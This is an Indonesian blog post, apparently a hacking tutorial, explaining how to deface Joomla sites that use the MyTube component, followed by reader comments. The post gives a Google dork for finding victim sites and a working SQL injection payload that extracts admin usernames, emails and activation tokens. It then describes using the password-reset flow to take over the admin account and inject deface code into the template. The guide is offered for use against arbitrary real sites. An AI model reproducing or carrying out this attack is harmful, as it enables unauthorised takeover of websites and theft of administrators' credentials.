Cara Hacking atau Deface Web Berbasis Joomla Dengan Teknik “Exploit MyTube”

Kali ini saya mau mebagi cara hacking yang mudah untuk diterapkan, namun dengan tingkat keberhasilan yang kecil. Sebenarnya ada banyak sekali cara dalam hacking web berbasis joomla ini. Apalagi dari daftar dork yang ada. Oke, langsung aja

Menemukan Target dan Exploit

Exploit adalah sebuah kode yang menyerang keamanan komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Bisa juga dikatakan sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.

Caranya cukup mudah, masuk ke google.com lalu paste inurl:”option=com_mytube” lalu tekan enter. Pilih salah satu website yang anda inginkan. Sudah? lanjut ke tahap yang berikutnya.

Misalkan alamat web yang telah anda dapatkan adalah http://alamattarget.com/index.php?option=com_mytube&Itemid=12 maka, tambahkan

&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+

0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,

0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+

jos_users+where+id=62–

setelah angka 12 tadi, lalu tekan enter.

Jika sudah, maka akan tampil seperti berikut ini

Di situ, kita bisa melihat admin dan email si admin. Oke, selanjutnya buka tab baru, masuk ke http://alamattarget.com/index.php?option=com_user&view=reset ini merupakan bentuk umum untuk me-reset password.

Kemudian masukan alamat email yang telah ditemukan tadi, lalu klik submit. Setelah itu, pindah ke tab awal, klik F5 untuk me-refresh page, lalu tulisan ea044f8847… akan berubah, inilh tokennya. Nah, jika menemukan tanda “$” setelah di refresh, maka teknik ini tidak bisa dijalankan dan anda harus mencari target lain. Jika sukses, maka lanjutkan ke tahap berikutnya.

Tahap berikutnya yaitu masuk ke login panel. Setelah memasukan token tadi, maka anda akan diminta memasukan password baru, disitulah anda memasukan password baru sesuai yang anda inginkan. setelah semua berjalan dengan lancar, maka yang harus anda lakukan adalah masuk ke http://alamattarget.com/administrator ini merupakan betuk umum dari login panel joomla.

Setelah itu, masuk ke Extensions >> Template Manager >> Default Template Name >> Edit HTML. Di bagian edit HTML ini, anda dapat memasukan kode deface, kemudian klik save, dan apply. Selesai.

Comments
14 Responses to “Cara Hacking atau Deface Web Berbasis Joomla Dengan Teknik “Exploit MyTube””
  1. Rafi mengatakan:

    Kakak, kok kaga bisa yah-?
    engga kebuka nih
    tulisannya “Warning: Invalid argument supplied for foreach() in /home/content/31/4389031/html/test/components/com_mytube/views/videos/tmpl/default.php on line 99”

    We don’t have any videos in this section yet.

    • Damar Dwiyadi Pratama mengatakan:

      ya karena si target gak punya video yang di upload, cara ini cuma buat situs joomla yang ada videonya..

  2. Jaka mengatakan:

    langsung tak cek gan,, thanks

  3. zomber mengatakan:

    hasil copas ..ya mas

  4. internetipood 1a.ee mengatakan:

    We are a group of volunteers and starting a new scheme in our community.

    Your site offered us with useful information to work on.

    You’ve done an impressive task and our entire neighborhood might be grateful to you.

  5. bimbel online mengatakan:

    makasih banyak ya moga manfaat

  6. Istanamurah mengatakan:

    waduhhh kalo ane sepintar itu ane gak akan kasih tahu cara untuk merusak web orang lain gan, kasihan karena ngprogram web butuh waktu lama tapi dirusak,😀

  7. danur rafidin mengatakan:

    wah boleh juga nih di praktekin, from http://rajaplastikindonesia.com

  8. EnterGoal mengatakan:

    Wih, keren nih artikelnya. Boleh dicoba. Makasih banyak gan buat artikelnya.

  9. Angela L. Bonner mengatakan:

    I really like what you guys are up too. This kind of clever work and reporting! Keep up the great works guys I’ve added you guys to our blogroll.|

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

  • Artikel Menarik Punya Damar

    Weblog Milik Damar Dwiyadi Pratama
    Copyright © 2009-2011 artikelmenarik.wordpress.com.
    All rights reserved.

%d blogger menyukai ini: